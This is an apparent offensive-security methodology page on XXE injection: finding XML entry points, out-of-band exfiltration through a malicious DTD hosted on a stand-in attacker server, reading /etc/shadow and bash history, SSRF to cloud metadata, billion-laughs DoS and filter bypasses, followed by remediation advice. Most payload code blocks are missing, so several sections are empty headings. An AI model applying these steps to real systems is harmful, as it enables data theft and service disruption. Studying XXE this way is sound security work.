XML External Entity (XXE) Injection
XML External Entity (XXE) Injection
Shortcut
Find data entry points that you can use to submit XML data.
Determine whether the entry point is a candidate for a classic or blind XXE. The endpoint might be vulnerable to classic XXE if it returns the parsed XML data in the HTTP response. If the endpoint does not return results, it might still be vulnerable to blind XXE, and you should set up a callback listener for your tests.
Try out a few test payloads to see if the parser is improperly configured. In the case of classic XXE, you can check whether the parser is processing external entities. In the case of blind XXE, you can make the server send requests to your callback listener to see if you can trigger outbound interaction.
Try to exfiltrate a common system file, like /etc/hostname.
You can also try to retrieve some more sensitive system files, like /etc/shadow or ~/.bash_history.
If you cannot exfiltrate the entire file with a simple XXE payload, try to use an alternative data exfiltration method.
See if you can launch an SSRF attack using the XXE.
Mechanisms
XML External Entity (XXE) is a vulnerability that occurs when XML parsers process external entity references within XML documents. XXE attacks target applications that parse XML input and can lead to:
Disclosure of confidential files and data
Server-side request forgery (SSRF)
Denial of service attacks
Remote code execution in some cases
XXE vulnerabilities arise from XML's Document Type Definition (DTD) feature, which allows defining entities that can reference external resources. When a vulnerable XML parser processes these entities, it retrieves and includes the external resources, potentially exposing sensitive information.
In practice, full remote code execution rarely stems from XXE alone; it typically requires language-specific gadgets—such as PHP's expect:// wrapper or Java deserialization sinks—which XXE merely helps reach.
Types of XXE attacks include:
Classic XXE: Direct extraction of data visible in responses
Blind XXE: No direct output, but data can be exfiltrated through out-of-band techniques
Error-based XXE: Leveraging error messages to extract data
XInclude-based XXE: Using XInclude when direct DTD access is restricted
Hunt
Finding XXE Vulnerabilities
Additional Discovery Methods
Convert content type from "application/json"/"application/x-www-form-urlencoded" to "application/xml"
Check file uploads that allow docx/xlsx/pdf/zip - unzip the package and add XML code into the XML files
Test SVG file uploads for XML injection
Check RSS feeds functionality for XML injection
Fuzz for /soap API endpoints
Test SSO integration points for XML injection in SAML requests/responses
Identify XML Injection Points
API Endpoints: Look for endpoints accepting XML data
File Uploads: Features accepting XML-based files (DOCX, SVG, XML, etc.)
Format Conversion: Services converting to/from XML formats
Legacy Interfaces: SOAP web services, XML-RPC
Hidden XML Parsers: Look for parameters that might be processed as XML behind the scenes
Content Type Conversion: Endpoints that accept JSON but may process XML with proper Content-Type
Test Basic XXE Patterns
For each potential injection point, test with simple payloads:
Classic XXE (file retrieval):
or
Blind XXE (out-of-band detection):
XInclude attack (when unable to define a DTD):
Billion Laughs Attack Steps
Capture the request in your proxy tool
Send it to repeater and convert body to XML format
Check the Accept header and modify to Application/xml if needed
Convert JSON to XML if no direct XML input is possible
Insert the billion laughs payload between XML tags
Adjust entity references (lol1 to lol9) to control DoS intensity
Check Alternative XML Formats
SVG files:
or
DOCX/XLSX files: Modify internal XML files (e.g., word/document.xml)
SOAP messages: Test XXE in SOAP envelope
SAML 2.0 XXE Testing
SAML assertions are prime XXE targets. Test both requests and responses:
AuthnRequest XXE:
Response Assertion XXE:
Encrypted Assertion XXE (Response Wrapping):
E-book Format Exploitation (EPUB)
EPUB files are ZIP archives containing XML. Target library management systems and e-reader apps:
Attack workflow:
Create legitimate EPUB file
Extract contents (it's a ZIP)
Inject XXE into
META-INF/container.xmlorcontent.opfRe-zip and upload to target (library systems, e-commerce platforms)
Apple Universal Links XXE
iOS deep linking configuration files:
Advanced XXE Hunting
Parameter Entity Testing
Error-Based XXE
XXE via Content-Type Manipulation
Try changing Content-Type header from:
to:
or:
Chaining and Escalation
Cloud-Native & Kubernetes XXE
Kubernetes Admission Webhook XXE
ValidatingWebhookConfiguration and MutatingWebhookConfiguration receive XML-formatted requests:
Exploitation flow:
ConfigMap XXE:
CI/CD Pipeline XXE
Jenkins XML Config Parsing:
GitLab CI Artifact Processing:
GitHub Actions Workflow:
Maven/Gradle Dependency Confusion:
Parser Misconfigurations
DTD Processing Enabled: XML parsers with DTD processing enabled
External Entity Resolution: Parsers allowing external entity references
XInclude Support: Enabled processing of XInclude statements
Missing Entity Validation: No validation of entity expansion
File Disclosure via XXE
Local File Access: Reading sensitive system files
/etc/passwd(Unix user information)/etc/shadow(password hashes on Linux)C:\Windows\system32\drivers\etc\hosts(Windows hosts file)Application configuration files
Source code files
Database credentials
SSRF via XXE
Internal Network Access: Scanning internal systems
Cloud Metadata Access: Accessing metadata services
AWS IMDSv2 (Token-based, harder via XXE):
Azure Instance Metadata:
GCP Metadata v2 (2024+):
Workarounds for header-protected metadata:
Denial of Service
Billion Laughs Attack: Exponential entity expansion
Quadratic Blowup Attack: Large string repeating
External Resource DoS: Loading large or never-ending external resources
Bypass Techniques
Filter Evasion Techniques
Case Variation:
Alternative Protocol Schemes:
URL Encoding:
XXE in CDATA Sections
XXE via XML Namespace
PHP Wrapper inside XXE
Methodologies
Tools
XXE Detection and Exploitation Tools
OWASP ZAP: XML External Entity scanner
Burp Suite Pro: XXE scanner extension
XXEinjector: Automated XXE testing tool
XXE-FTP: Out-of-band XXE exploitation framework
dtd.gen: DTD generator for XXE exfiltration
oxml_sec: Tool for testing XXE in OOXML files (docx, xlsx, pptx)
Burp Suite Pro 2025.2+ (“Burp AI”): automatically chains scanner-found XXE with out-of-band callbacks for quicker triage.
Semgrep rules (java-xxe, python-xxe): static analysis that flags un-hardened XML parser usage.
Setup Tools for Out-of-Band Testing
Interactsh: Interaction collection server
Burp Collaborator: For out-of-band data detection
XSS Hunter: Can be repurposed for XXE callbacks
SimpleHTTPServer: Quick Python HTTP server setup
Testing Methodologies
Basic Testing Process
Identify XML Processing: Locate endpoints accepting XML input
Setup Monitoring: Prepare out-of-band detection for blind XXE
Injection Testing: Test with basic XXE payloads
Result Analysis: Check for direct data exposure or callbacks
Vulnerability Confirmation: Attempt to read a harmless file like
/etc/hostname
Advanced Exploitation Techniques
Data Exfiltration (for Blind XXE)
Host a malicious DTD file on your server:
Use an XXE payload that references your DTD:
XXE OOB with DTD and PHP filter
Payload:
External DTD (http://your-attacker-server.com/dtd.xml):
Error-Based Exfiltration
Host a malicious DTD with error-based exfiltration:
XXE for SSRF
Use XXE to trigger internal requests:
XXE Inside SOAP
XXE PoC Examples
XXE via File Upload (SVG Example)
Create an SVG file with the payload:
Upload it where SVG is allowed (e.g., profile picture, comment attachment).
Comprehensive XXE Testing Checklist
Basic entity testing:
Test file access via
file://protocolTest network access via
http://protocol
Content delivery:
Direct XXE with immediate results
Out-of-band XXE with remote DTD
Error-based XXE for data extraction
Protocol testing:
Test various protocols (file, http, https, ftp, etc.)
Attempt restricted protocol access
Format variations:
Test XXE in SVG uploads
Test XXE in document formats (DOCX, XLSX, PDF)
Test SOAP/XML-RPC interfaces
Bypasses:
Try character encoding tricks
Use nested entities
Apply URL encoding
Test with namespace manipulations
Remediation Recommendations
Disable DTD processing completely if possible
Disable external entity resolution
Implement proper input validation
Use safe XML parsers that disable XXE by default
Apply patch management to XML parsers
Use newer API formats like JSON where feasible
Network egress allow-list: Restrict outbound traffic from XML-parsing hosts to block blind-XXE callbacks.
API Gateway XML Protection: Implement XML threat protection at the gateway layer
API Gateway XML Threat Protection
AWS API Gateway
Kong Gateway
Apigee Edge
Nginx + ModSecurity
Parser default hardening (2024-2025)
libxml2 ≥ 2.13:
XML_PARSE_NO_XXEdisables all external entity resolution by default.Python ≥ 3.13: standard
xml.*modules forbid external entities; enable only viafeature_external_ges..NET 8: project templates set
XmlReaderSettings.DtdProcessing = Prohibit.Java 22:
XMLConstants.FEATURE_SECURE_PROCESSINGis enabled andexternal-general-entitiesisfalse.
Cloud-metadata nuance
AWS IMDSv2 now requires a session token. To exploit metadata via XXE you must first obtain a token with
PUT /latest/api/token and then pass it in the X-aws-ec2-metadata-token header of subsequent requests.
Secure Parser Configuration (practical snippets)
Last updated